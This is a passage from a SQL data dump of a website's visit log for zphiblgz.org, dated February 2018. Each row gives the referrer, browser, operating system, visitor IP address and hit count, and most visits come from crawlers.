f%2fzphiblgz.org%2f/RK=2/RS=Ff1iv26.dHOtEwM1qWi_DFpyO9A-','Safari','iPhone','11.0','','162.129.251.103','000',2,0),(23222,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',2,0),(23223,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',3,0),(23224,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',1,0),(23225,'2018-02-19','https://www.google.ca/','Firefox','Windows','58.0','','173.179.246.79','000',2,0),(23226,'2018-02-19','https://zphiblgz.org','Edge','Windows','15.15063','','192.198.80.227','000',5,0),(23227,'2018-02-19','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','172.56.2.45','000',1,0),(23228,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',2,0),(23229,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.16','000',1,0),(23230,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',3,0),(23231,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.20','000',3,0),(23232,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',2,0),(23233,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',3,0),(23234,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.77','000',1,0),(23235,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.180','000',1,0),(23236,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.41','000',1,0),(23237,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',1,0),(23238,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.67','000',1,0),(23239,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',2,0),(23240,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',3,0),(23241,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',4,0),(23242,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',3,0),(23243,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',2,0),(23244,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',2,0),(23245,'2018-02-19','https://zphiblgz.org/scholarship/','MSIE','Windows','11.0','','73.133.120.5','000',3,0),(23246,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',2,0),(23247,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',2,0),(23248,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(23249,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(23250,'2018-02-19','https://zphiblgz.org','Firefox','Windows','40.1','','186.6.79.132','000',2,0),(23251,'2018-02-19','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(23252,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',1,0),(23253,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',2,0),(23254,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(23255,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',4,0),(23256,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',1,0),(23257,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(23258,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',3,0),(23259,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(23260,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',3,0),(23261,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',1,0),(23262,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',1,0),(23263,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',1,0),(23264,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',1,0),(23265,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',2,0),(23266,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',6,0),(23267,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(23268,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(23269,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(23270,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.229','000',1,0),(23271,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.136','000',1,0),(23272,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.145','000',2,0),(23273,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.224','000',1,0),(23274,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.154','000',3,0),(23275,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.208','000',1,0),(23276,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',2,0),(23277,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(23278,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',4,0),(23279,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(23280,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(23281,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.51','000',1,0),(23282,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.211','000',1,0),(23283,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.206','000',2,0),(23284,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.114','000',1,0),(23285,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.196','000',2,0),(23286,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.178','000',1,0),(23287,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.2.91','000',20,0),(23288,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',1,0),(23289,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',1,0),(23290,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',2,0),(23291,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',1,0),(23292,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',1,0),(23293,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',3,0),(23294,'2018-02-19','https://zphiblgz.org','Safari','Linux','538.1','','23.250.82.164','000',2,0),(23295,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',3,0),(23296,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',1,0),(23297,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(23298,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',2,0),(23299,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',2,0),(23300,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.116','000',1,0),(23301,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.117','000',2,0),(23302,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.214','000',2,0),(23303,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.200','000',2,0),(23304,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.27','000',4,0),(23305,'2018-02-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(23306,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.53','000',1,0),(23307,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.199','000',2,0),(23308,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.203','000',1,0),(23309,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',2,0),(23310,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(23311,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',4,0),(23312,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',2,0),(23313,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',1,0),(23314,'2018-02-19','https://zphiblgz.org','Safari','iPhone','10.0','','174.205.0.11','000',6,0),(23315,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',2,0),(23316,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.66','000',1,0),(23317,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.86','000',2,0),(23318,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(23319,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.51','000',1,0),(23320,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',1,0),(23321,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(23322,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(23323,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',2,0),(23324,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',2,0),(23325,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(23326,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.215','000',1,0),(23327,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.147','000',2,0),(23328,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.139','000',1,0),(23329,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',1,0),(23330,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.225','000',1,0),(23331,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.117','000',2,0),(23332,'2018-02-19','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',3,0),(23333,'2018-02-19','http://svetka.info/','MSIE','Windows','6.0','','178.137.16.45','000',6,0),(23334,'2018-02-19','https://search.yahoo.com/','Firefox','Windows','58.0','','76.100.44.13','000',7,0),(23335,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',2,0),(23336,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.83','000',2,0),(23337,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.117','000',1,0),(23338,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.55','000',1,0),(23339,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',2,0),(23340,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.78','000',2,0),(23341,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',1,0),(23342,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',3,0),(23343,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.211','000',3,0),(23344,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',3,0),(23345,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',1,0),(23346,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(23347,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.119','000',1,0),(23348,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',2,0),(23349,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',2,0),(23350,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',4,0),(23351,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.112','000',1,0),(23352,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.28','000',1,0),(23353,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.68','000',1,0),(23354,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.25','000',1,0),(23355,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.73','000',2,0),(23356,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.250','000',1,0),(23357,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.133','000',1,0),(23358,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(23359,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',2,0),(23360,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',2,0),(23361,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(23362,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',2,0),(23363,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(23364,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',3,0),(23365,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',2,0),(23366,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.56','000',1,0),(23367,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(23368,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',4,0),(23369,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',1,0),(23370,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',2,0),(23371,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',1,0),(23372,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',1,0),(23373,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',1,0),(23374,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',2,0),(23375,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(23376,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',2,0),(23377,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.183','000',1,0),(23378,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',2,0),(23379,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',2,0),(23380,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(23381,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',1,0),(23382,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.144','000',1,0),(23383,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(23384,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(23385,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.23','000',2,0),(23386,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.148','000',1,0),(23387,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',1,0),(23388,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.102','000',2,0),(23389,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.208','000',3,0),(23390,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.9','000',1,0),(23391,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.12','000',2,0),(23392,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.10','000',1,0),(23393,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.23','000',2,0),(23394,'2018-02-19','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','69.138.175.246','000',1,0),(23395,'2018-02-19','https://zphiblgz.org/','Firefox','Linux','57.0','','76.0.20.141','000',2,0),(23396,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',2,0),(23397,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',2,0),(23398,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',1,0),(23399,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',1,0),(23400,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(23401,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',3,0),(23402,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(23403,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',2,0),(23404,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.49','000',1,0),(23405,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(23406,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(23407,'2018-02-19','android-app://com.google.android.googlequicksearchbox','Chrome','Android','64.0.3282.137','','99.203.17.238','000',2,0),(23408,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(23409,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',3,0),(23410,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(23411,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.129','000',1,0),(23412,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',2,0),(23413,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',2,0),(23414,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',2,0),(23415,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',2,0),(23416,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',1,0),(23417,'2018-02-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(23418,'2018-02-19','https://www.google.com/','Safari','Macintosh','9.1.2','','24.12.205.89','000',6,0),(23419,'2018-02-19','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','73.173.254.31','000',1,0),(23420,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',1,0),(23421,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',1,0),(23422,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(23423,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',1,0),(23424,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.228','000',1,0),(23425,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',2,0),(23426,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.27','000',2,0),(23427,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.20','000',1,0),(23428,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.18','000',1,0),(23429,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(23430,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',1,0),(23431,'2018-02-19','https://www.google.com/','Chrome','Windows','64.0.3282.167','','73.133.170.134','000',3,0),(23432,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(23433,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(23434,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',1,0),(23435,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',2,0),(23436,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.11','000',1,0),(23437,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',1,0),(23438,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(23439,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',1,0),(23440,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.171','000',1,0),(23441,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',1,0),(23442,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.249','000',1,0),(23443,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.100','000',1,0),(23444,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(23445,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',2,0),(23446,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',2,0),(23447,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',2,0),(23448,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(23449,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(23450,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(23451,'2018-02-19','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(23452,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',1,0),(23453,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',2,0),(23454,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(23455,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',2,0),(23456,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',2,0),(23457,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(23458,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.53','000',1,0),(23459,'2018-02-19','http://uralsk.xkaz.org/','Unknown','Unknown','Unknown','','134.249.48.151','000',3,0),(23460,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',1,0),(23461,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(23462,'2018-02-19','https://zphiblgz.org','Firefox','Windows','34.0','','192.187.101.178','000',2,0),(23463,'2018-02-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','174.136.12.180','000',1,0),(23464,'2018-02-19','http://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.140','','71.179.100.71','000',10,0),(23465,'2018-02-19','https://zphiblgz.org','Safari','iPhone','11.0','','71.179.100.71','000',1,0),(23466,'2018-02-19','https://zphiblgz.org/','Firefox','Windows','53.0','','77.120.125.23','000',2,0),(23467,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',2,0),(23468,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',3,0),(23469,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.228','000',1,0),(23470,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',3,0),(23471,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(23472,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',2,0),(23473,'2018-02-20','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',2,0),(23474,'2018-02-20','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','88.198.43.207','000',1,0),(23475,'2018-02-20','https://zphiblgz.org','Safari','Macintosh','5.1','','148.251.237.246','000',1,0),(23476,'2018-02-20','https://pills24h.com/buy-paroxetine-online-without-prescription/','MSIE','Windows','2.0d','','178.137.178.122','000',1,0),(23477,'2018-02-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1703.qGpcwUk94YNkEBs9CREVeFvSpA4uAHjZO2Hv48gwlgYkeBYmzexUKcUWzYiUtYWx.197179bd3aba4b33da40cee75b17493b2f5707b8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSndzZ1U4RlNKaHZRYlhBVm1SMDdDSlJjODZnaHJHMlFYNEh2ZWFSMVkzN1FkSVNzWUpWN2pmUDktWkY0Z2ZGcnMyUzh5d2VnODFWZw&b64e=2&sign=ca1c3d1aecee85b740a2a780d558eea0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlOEFAeqExlDmGI-s-bW713aCzQNIFqN9oFn7n3VwneO7e-5WT_2H5XjhPZono2izvkdQ8cRM0wNmfQ8YvEDYXw63df5zZsstOtUChCxkJ7fmRES-xpSjwXyAU8PMIz5Zu&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEGh_M6ydNXT-xsdMSRhWBM2lNcBR8JiInB5qaCEzhwp2hqykVcg3ecO3d_M_4mgYxw&l10n=ru&cts=1519107302925&mc=6.92835335729','MSIE','Windows','8.0','','178.140.207.180','000',1,0),(23478,'2018-02-20','https://pills24h.com/buy-dapoxetine-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',1,0),(23479,'2018-02-20','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(23480,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','204.93.177.164','000',1,0),(23481,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','191.252.19.61','000',1,0),(23482,'2018-02-20','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(23483,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','208.64.137.231','000',1,0),(23484,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.198.165.243','000',1,0),(23485,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.218','000',1,0),(23486,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.153','000',1,0),(23487,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','97.74.24.192','000',1,0),(23488,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','U